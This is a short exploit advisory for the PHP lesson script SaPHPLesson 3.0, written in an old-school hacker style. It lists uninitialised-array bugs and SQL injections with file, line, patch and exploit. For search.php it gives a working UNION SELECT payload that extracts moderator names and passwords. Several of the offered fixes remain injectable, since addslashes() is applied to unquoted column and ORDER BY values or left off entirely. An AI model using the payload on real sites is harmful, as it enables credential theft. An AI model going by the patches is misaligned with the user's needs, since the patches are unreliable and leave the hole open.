SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:

	1- Unfilter array

    	Filename	:- show.php
        Line		:- 102

[code]
$hrow[] = $Row2;[/code]

Fix :-

Add To Line [ 11 ] /show.php This Code :-

	we add the code to global to fix all unfilter ver. at the code :)

[code]
$hrow = array();[/code]

Exploit :-

	GET ^
		/lessons/show.php?lessid=1&hrow=D3vil-0x1

/---------------------------------------------------------/

	2- Unfilter array

    	Filename	:- showcat.php
        Line		:- 80

[code]
$Lsnrow[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /showcat.php This Code :-

	we add the code to global to fix all unfilter ver. at the code :)

[code]
$Lsnrow = array();[/code]

Exploit :-

	GET ^

    	/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1

/---------------------------------------------------------/

	3- SQL Injection

    	Filename	:- search.php
        Line		:- MultLines

Fix :-

	Line 28 Replace It With

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

	Line 32 Replace It With

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

	Exploit :-

    	POST ^

    	Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC

/---------------------------------------------------------/

	4- SQL Injection

    	Filename	:- misc.php
        Line		:- 64

Fix :-
	Replace Line 62 & 63 With This Code

[code]
$LID  = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]

/---------------------------------------------------------/

	5- Unfilter array

    	Filename	:- index.php
        Line		:- 24

[code]
$rows[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /index.php This Code :-

	we add the code to global to fix all unfilter ver. at the code :)

[code]
$rows = array();
$hrow = array();[/code]

Exploit :-

	GET ^

    	/saphplesson/index.php?rows=D3vil-x01